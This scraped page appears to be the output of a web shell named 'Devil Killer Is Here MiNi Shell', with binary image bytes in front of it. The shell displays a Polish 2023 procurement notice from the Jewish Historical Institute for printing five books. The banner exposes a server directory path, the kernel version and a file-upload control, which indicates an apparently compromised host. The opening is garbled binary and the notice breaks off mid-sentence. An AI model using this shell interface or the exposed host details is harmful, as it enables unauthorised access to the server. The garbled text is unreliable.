JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230925/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20230925/0041249401-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Druk 5 wydawnictw Żydowskiego Instytutu Historycznego </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zydowski Instytut Historyczny im. Emanuela Ringelbluma</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 141689541</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Tłomackie 3/5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">00-090</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">22 827 92 21</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">secretary@jhi.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.jhi.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - państwowe i samorządowe instytucje kultury</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Druk 5 wydawnictw Żydowskiego Instytutu Historycznego </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7a8793e4-5b9e-11ee-9aa3-96d3b4440790</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00412494</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-09-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00082578/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.9 Druk 5 wydawnictw Żydowskiego Instytutu Historycznego</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-7a8793e4-5b9e-11ee-9aa3-96d3b4440790 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/pl<br/>adres poczty elektronicznej: administracja@jhi.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W trakcie trwania przedmiotowego postępowania komunikacja między Zamawiającym a Wykonawcami odbywać się będzie poprzez platformę eZamówienia (zwaną dalej: „Platformą”), dostępną pod adresem: https://ezamowienia.gov.pl/pl/. Rejestracja i korzystanie z Platformy przez Wykonawcę jest bezpłatne.<br/>2. Wykonawca zamierzający wziąć udział w przedmiotowym postępowaniu, zobowiązany jest do posiadania konta „Wykonawcy” na Platformie. Wykonawca posiadający konto ma dostęp do następujących formularzy: „Formularz ofertowy” oraz do „Formularza do komunikacji”. Składanie ofert dostępne jest tylko dla użytkowników będących Wykonawcami, posiadającymi rolę „Składanie ofert /wniosków / prac konkursowych” (Instrukcja interaktywna „Oferty, wnioski i prace konkursowe: https://media.ezamowienia.gov.pl/pod/2021/10/Oferty-5.2.pdf)<br/>3. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z Platformy (https://ezamowienia.gov.pl/pl/regulamin/#regulamin-serwisu).<br/>4. Za datę przekazania dokumentów przyjmuje się datę ich przekazania na Platformie<br/>5. W postępowaniu o udzielenie zamówienia komunikacja pomiędzy Zamawiającym a Wykonawcami w szczególności składanie oświadczeń, zawiadomień oraz przekazywanie informacji odbywa się elektronicznie za pośrednictwem dedykowanego formularza:<br/>„Formularz do komunikacji” dostępnego na Platformie. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem ogłoszenia. (Instrukcja interaktywna: Komunikacja w postępowaniu https://media.ezamowienia.gov.pl/pod/2021/10/Komunikacja-w-postepowaniu-5.1.pdf).<br/>6. Zamawiający może również komunikować się z Wykonawcami z wykorzystaniem poczty elektronicznej – adres mail: administracja@jhi.pl<br/>7. Dokumenty elektroniczne, składane są przez Wykonawcę poprzez „Formularz do komunikacji” w formie załączników.<br/>8. Dokumenty elektroniczne muszą być zgodne z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 poz. 2452) oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. z 2020 poz. 2415).<br/>9. Oferta musi być sporządzona w języku polskim, w wersji elektronicznej, w formacie danych zgodnym z obowiązującym rozporządzeniem Rady Ministrów z dnia 12 kwietnia 2012 r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych i podpisana kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym<br/>przez osobę upoważnioną do reprezentowania Wykonawcy, zgodnie z formą reprezentacji Wykonawcy określoną w rejestrze lub innym dokumencie, właściwym dla danej formy organizacyjnej Wykonawcy albo przez upełnomocnionego przedstawiciela Wykonawcy. Zamawiający nie rekomenduje podpisu elektronicznego zewnętrznego (XAdES +doc). Zamawiający nie obsługuje systemu plików Apple File System (APFS).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.10.) Przyczyny odstąpienia od komunikacji elektronicznej: </h3> <p class="mb-0">zamawiający wymaga przedstawienia modelu fizycznego, modelu w skali lub próbki, których nie można przekazać przy użyciu środków komunikacji elektronicznej (art. 65 ust. 1 pkt 4 ustawy)</p> <h3 class="mb-0">3.11.) Sposób nieelektronicznego składania ofert, wniosków, oświadczeń oraz innych dokumentów: <span class="normal">W zakresie złożenia próbki Zamawiający, na podstawie art. 65 ust. 1 pkt 4) upzp, odstępuje od wymogu użycia środków komunikacji elektronicznej.<br/>Próbkę należy złożyć w formie fizycznej siedzibie Zamawiającego z dopiskiem „Dotyczy postępowania o zamówienie publiczne na druk 5 wydawnictw Żydowskiego Instytutu Historycznego z jednoczesnym podaniem danych Wykonawcy.<br/>Jeżeli próbka zostanie złożona w inny niż wyżej opisany sposób, Zamawiający nie bierze odpowiedzialności za przypadkowe otwarcie przesyłki. Wybór drogi pocztowej dla przesłania próbki następuje na ryzyko Wykonawcy. Wykonawca winien we własnym interesie, w taki sposób przygotować przesyłkę, aby w stopniu maksymalnym zapobiec jej uszkodzeniu w czasie transportu.<br/>W przypadku złożenia próbki za pośrednictwem firmy kurierskiej Zamawiający zaleca, aby opakowanie kurierskie również było opisane w powyższy sposób.<br/>Zamawiający nie bierze odpowiedzialności za niewłaściwe i niezgodne z powyższą instrukcją opisanie przesyłki, a w przypadku otwarcia takiej przesyłki przez Zamawiającego po terminie otwarcia ofert zawarta w środku próbka zostanie potraktowana jako próbka złożona po terminie - nawet jeżeli wpłyną do Zamawiającego przed upływem terminu składania ofert.<br/>Mając na uwadze zapisy art. 107 ust. 3 upzp, Zamawiający informuje, że przedmiotowe środki dowodowe o których mowa w niniejszym ustępie nie podlegają uzupełnieniu, ponieważ służą potwierdzeniu zgodności z kryteriami określonymi w opisie kryteriów oceny ofert.<br/>Brak złożenia próbki, złożenie próbki po terminie, złożenie próbki w innym miejscu niż wskazane lub złożenie próbki niezgodnych z wymaganiami Zamawiającego skutkować będzie odrzuceniem oferty na podstawie art. 226 ust. 1 pkt. 2 ppkt. c) upzp.<br/>Wykonawcom, przysługuje możliwość zwrotu próbek na pisemny wniosek.</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ogólnego rozporządzenia o ochronie danych osobowych z dnia 26 kwietnia 2016 (Dz. Urz. UE L 2016, Nr 119, dalej RODO), Zamawiający informuje, że:<br/>1.	Administratorem Pani/Pana danych osobowych jest Żydowski Instytut Historyczny im. Emanuela Ringelbluma z siedzibą w Warszawie (00-090) przy ul. Tłomackie 3/5,<br/>2.	kontakt z Inspektorem Ochrony Danych Użyczającego możliwy jest pod adresem email: iodo@jhi.pl<br/>3.	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. b RODO w związku<br/>z przedmiotowym postępowaniem o udzielenie zamówienia publicznego.<br/>4.	odbiorcami Pani/Pana danych osobowych będą podmioty świadczące usługę obsługi systemów<br/>i oprogramowania informatycznego administratora, zewnętrzne podmioty świadczące usługi na rzecz administratora, oraz podmioty uprawnione do uzyskania danych osobowych na podstawie przepisów prawa (w tym organy administracji publicznej).<br/>5.	posiada Pani/Pan prawo do żądania od administratora dostępu do danych osobowych, ich sprostowania, usunięcia lub ograniczenia przetwarzania, w przypadkach określonych w przepisach RODO.<br/>6.	Pani/Pana dane osobowe przetwarzane będą przez cały okres realizacji Umowy i jej rozliczenia, a po zakończeniu realizacji Umowy przechowywane będą w celu obowiązkowej archiwizacji dokumentacji finansowo-księgowej przez czas określony w odrębnych przepisach.<br/>7.	ma Pani/Pan prawo wniesienia skargi do organu nadzorczego, tj. Prezesa Urzędu Ochrony Danych Osobowych.<br/>8.	Podanie danych osobowych przez Panią/Pana jest wymogiem umownym, w przypadku odmowy podania danych może nie dojść do zawarcia Umowy.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">10/2023/DW</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest druk wydawnictwa Żydowskiego Instytutu Historycznego im. Emanuela Ringelbluma zgodnie z poniższą specyfikacją:<br/>1.1.	Kicur Szulchan aruch<br/>1.1.1.	Nakład: 500 egz.<br/>1.1.2.	Format: 160 mm × 240 mm<br/>1.1.3.	Oprawa: twarda, szyta nićmi, kapitałka ciemna zieleń, tasiemka ciemna zieleń<br/>1.1.4.	Technologia druku środka: cyfrowa <br/>1.1.5.	Druk środka: B/W 1+1<br/>1.1.6.	Papier środka: Alto Naturel 90g/m2 vol. 1.3 lub równoważny, tj. papier niepowlekany o gramaturze 90 g/m2, nieprzezroczystości 93%, grubości 117 µm, spulchnieniu 1.3, białości 80 CIE, gładkości 250 ml/min<br/>1.1.7.	Technologia druku okładki: cyfrowa<br/>1.1.8.	Surowiec okładki: tek. 2-2,5 mm; okleina: płótno ASSUAN 5038 lub równoważny, tj. okleina introligatorska na podkładzie papierowym w kolorze odpowiadającym odcieniowi Assuan 5038; wyklejka: Geltex 125g reflejos - 191 Verde lub równoważny, tj. okleina introligatorska papierowa barwiona w masie o gramaturze 125g/m2 w kolorze odpowiadającym kolorowi Reflejos 191 Verde<br/>1.1.9.	Druk okładki: 1+0<br/>1.1.10.	Uszlachetnienia dot. okładki: hot-stamping - srebrna folia grafmaj 100/silver w liternictwie<br/>1.1.11.	Liczba stron: 680<br/>1.2.	Sz. Datner, Zagłada Białegostoku i Białostocczyzny<br/>1.2.1.	Nakład: 300 egz.<br/>1.2.2.	Format: 150 mm × 210 mm<br/>1.2.3.	Oprawa: miękka klejona z frezowaniem zapobiegającym wypadaniu kartek + głębokie skrzydła (każde po 128 mm)<br/>1.2.4.	Technologia druku środka: cyfrowa<br/>1.2.5.	Druk środka: B/W 1+1<br/>1.2.6.	Papier środka: Munken Polar 100 g/m² lub równoważny, tj. papier niepowlekany o gramaturze 100 g/m2, nieprzezroczystości 93%, grubości 113 µm, spulchnieniu 1.13, białości 145 CIE, gładkości 150 ml/min<br/>1.2.7.	Technologia druku okładki: cyfrowa<br/>1.2.8.	Surowiec okładki: Ensocoat 250 g/m2 lub równoważny, tj. karton SBS 250 g/m² z podwójnie powlekaną stroną wierzchnią oraz pigmentowaną stroną spodnią<br/>1.2.9.	Druk okładki: 4+0<br/>1.2.10.	Uszlachetnienia dot. okładki: lakier dyspersyjny<br/>1.2.11.	Wkładka: 1 strona na końcu bloku, druk: CMYK 4+0, papier: kreda silk 115g/m²<br/>1.2.12.	Liczba stron: 385 (+/-5%)<br/>1.3.	J. Doktór, Jakub Frank i jego mesjańska droga<br/>1.3.1.	Nakład: 300 egz.<br/>1.3.2.	Format: 138 mm × 200 mm<br/>1.3.3.	Oprawa: miękka szyto-klejona ze skrzydełkami (każde ok. 100 mm)<br/>1.3.4.	Technologia druku środka: cyfrowa <br/>1.3.5.	Druk środka: B/W 1+1<br/>1.3.6.	Papier środka: Alto Naturel 90 g/m2 vol 1.5 lub równoważny, tj. papier niepowlekany o gramaturze 90 g/m2, nieprzezroczystości 93%, grubości 117 µm, spulchnieniu 1.5, białości 80 CIE, gładkości 250 ml/min<br/>1.3.7.	Technologia druku okładki: cyfrowa<br/>1.3.8.	Druk okładki: CMYK 4+4<br/>1.3.9.	Surowiec okładki: karton GC1 250g/m2<br/>1.3.10.	Uszlachetnienia dot. okładki: folia matowa + lakier wybiórczo UV 1+0<br/>1.3.11.	Liczba stron: 300 (+/-5%)<br/>1.4.	Tłomackie 3/5, nr 3/2023<br/>1.4.1.	Nakład: 1200 egz.<br/>1.4.2.	Format: 230 mm × 297 mm<br/>1.4.3.	Oprawa: zeszytowa<br/>1.4.4.	Technologia druku środka: cyfrowa <br/>1.4.5.	Druk środka: CMYK 4+4<br/>1.4.6.	Papier środka: biały powlekany mat lub silk 100-120 g/2<br/>1.4.7.	Technologia druku okładki: cyfrowa<br/>1.4.8.	Druk okładki: CMYK 4+4<br/>1.4.9.	Surowiec okładki: kreda mat 300 g/m2<br/>1.4.10.	Uszlachetnienia dot. okładki: folia matowa jednostronna<br/>1.4.11.	Liczba stron: 60 (+/- 5%) + okładka<br/>1.5.	Tłomackie 3/5, numer archiwalny<br/>1.5.1.	Nakład: 300 egz.<br/>1.5.2.	Format: 230 mm × 297 mm<br/>1.5.3.	Oprawa: zeszytowa<br/>1.5.4.	Technologia druku środka: cyfrowa <br/>1.5.5.	Druk środka: CMYK 4+4<br/>1.5.6.	Papier środka: biały powlekany mat lub silk 100-120 g/2<br/>1.5.7.	Technologia druku okładki: cyfrowa<br/>1.5.8.	Druk okładki: CMYK 4+4<br/>1.5.9.	Surowiec okładki: kreda mat 300 g/m2<br/>1.5.10.	Uszlachetnienia dot. okładki: folia matowa jednostronna<br/>1.5.11.	Liczba stron: 60 (+/- 5%) + okładka<br/><br/>UWAGA!!!<br/>2.	Dodatkowe informacje dotyczące realizacji przedmiotu zamówienia:<br/>2.1.	Wykonawca jest zobowiązany uzgodnić z Zamawiającym przed rozpoczęciem realizacji druku finalną wersję specyfikacji technicznej, zawierającej w szczególności informacje na temat wykorzystanych surowców (surowiec okładki, papier środka, uszlachetnienia) oraz technologii druku,<br/>2.2.	termin realizacji druku nie będzie dłuższy niż 14 dni od dnia zatwierdzenia przez Wykonawcę plików drukarskich otrzymanych od Zamawiającego drogą elektroniczną,<br/>2.3.	po otrzymaniu plików drukarskich Wykonawca jest zobowiązany zatwierdzić przekazane przez Zamawiającego pliki drukarskie i powiadomić o tym Zamawiającego drogą mailową w terminie 1 dnia;<br/>2.4.	w razie wystąpienia wady w plikach drukarskich Zamawiający jest zobowiązany przedstawić poprawione pliki drukarskie Wykonawcy w terminie do 1 dni; Wykonawca jest zobowiązany zatwierdzić poprawione pliki drukarskie dostarczone przez Zamawiającego w terminie 1 dnia;<br/>2.5.	Wykonawca jest zobowiązany przedstawić Zamawiającemu do akceptacji przed rozpoczęciem druku plik zawierający podgląd okładki w wersji produkcyjnej. Zamawiający jest zobowiązany zaakceptować przedstawiony plik w terminie 1 dnia;<br/>2.6.	kompletny nakład Wykonawca dostarczy do siedziby Zamawiającego: ul. Tłomackie 3/5, 00- 090 Warszawa, o czym Wykonawca jest zobowiązany poinformować Zamawiającego na 2 dni przed zaplanowanym terminem dostawy,<br/>2.7.	książki składające się na kompletny nakład będą pakowane w paczki zabezpieczone w sposób trwały przed wpływem warunków atmosferycznych oraz będą miały zabezpieczone narożniki. Jedna paczka nie może zawierać więcej niż 10 sztuk książek. Do paczek zostanie dołączony dokument WZ informujący o liczbie dostarczonych książek,<br/>2.8.	Zamawiający ma prawo odmówić przyjęcia dostawy nakładu w sytuacji, gdy:<br/>2.9.	Wykonawca wraz z towarem nie dostarczy dokumentu WZ,<br/>2.10.	Wykonawca nie poinformuje Zamawiającego o terminie dostawy ze stosownym wyprzedzeniem,<br/>2.11.	Wykonawca spakuje towar niezgodnie ze specyfikacją,<br/>2.12.	Towar jest mechanicznie uszkodzony lub ma inne wady, w tym techniczne, widoczne w chwili przyjęcia,<br/>2.13.	Zamawiający zachowuje prawo do odesłania na koszt Wykonawcy nakładu dostarczonego przez Wykonawcę, jeśli w trakcie weryfikacji losowo wybranych sztuk książek z dostarczonego nakładu 15% z nich będzie wadliwych. Weryfikacja losowo wybranych sztuk książek z dostarczonego nakładu odbędzie się w terminie do 7 dni od dostarczenia kompletnego nakładu do siedziby Zamawiającego,<br/>2.14.	Zamawiający w terminie do 7 dni od dostarczenia kompletnego nakładu do siedziby Zamawiającego poinformuje Wykonawcę drogą mailową o przyjęciu dostarczonego nakładu lub o konieczności jego odesłania,<br/>2.15.	Wykonawca prześle fakturę/faktury w formie elektronicznej i prześle je na adres mailowy: faktury@jhi.pl najpóźniej w terminie 1 dnia od otrzymania drogą mailową informacji od Zamawiającego o przyjęciu dostarczonego nakładu,<br/>2.16.	Zamawiający zachowuje prawo niezrealizowania druku 1 pozycji wydawniczej opisanej w ust. 1,<br/>2.17.	W przypadku pozycji J. Doktór Jakub Frank i jego mesjańska droga Wykonawca prześle na swój koszt wydruk okładki na docelowym surowcu, wykonany docelową techniką do akceptacji przed rozpoczęciem druku całego nakładu.<br/>2.18.	Druk będący przedmiotem zamówienia musi zostać zrealizowany najpóźniej w terminie do 13 grudnia 2023 roku, przy czym Zamawiający zobowiązuje się dostarczyć pliki drukarskie do realizowanych druków najpóźniej w terminie do 29 listopada 2023 roku. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79810000-5 - Usługi drukowania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-13</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Kryterium „Cena za realizację przedmiotu zamówienia” (C):<br/>1.1.	Maksymalna liczba punktów to 58 punkty.<br/>1.2..	W tym kryterium punkty będą przyznawane zgodnie z następującym sposobem obliczenia: <br/>1.2.1.	dla druku nr 1 (C1): oferta z najniższą ceną uzyska maksymalną liczbę punktów, tj. Cmin = 19 pkt. Punkty pozostałych ofert zostaną przeliczone zgodnie z: (Cmin : Cb) × 19 pkt, gdzie: Cmin – cena oferty minimalnej, Cb – cena oferty badanej.<br/>1.2.2.	dla druku nr 2 (C2): oferta z najniższą ceną uzyska maksymalną liczbę punktów, tj. Cmin = 13 pkt. Punkty pozostałych ofert zostaną przeliczone zgodnie z: (Cmin : Cb) × 13 pkt, gdzie: Cmin – cena oferty minimalnej, Cb – cena oferty badanej.<br/>1.2.3.	dla druku nr 3 (C3): oferta z najniższą ceną uzyska maksymalną liczbę punktów, tj. Cmin = 13 pkt. Punkty pozostałych ofert zostaną przeliczone zgodnie z: (Cmin : Cb) × 13 pkt, gdzie: Cmin – cena oferty minimalnej, Cb – cena oferty badanej.<br/>1.2.4.	dla druku nr 4 (C4): oferta z najniższą ceną uzyska maksymalną liczbę 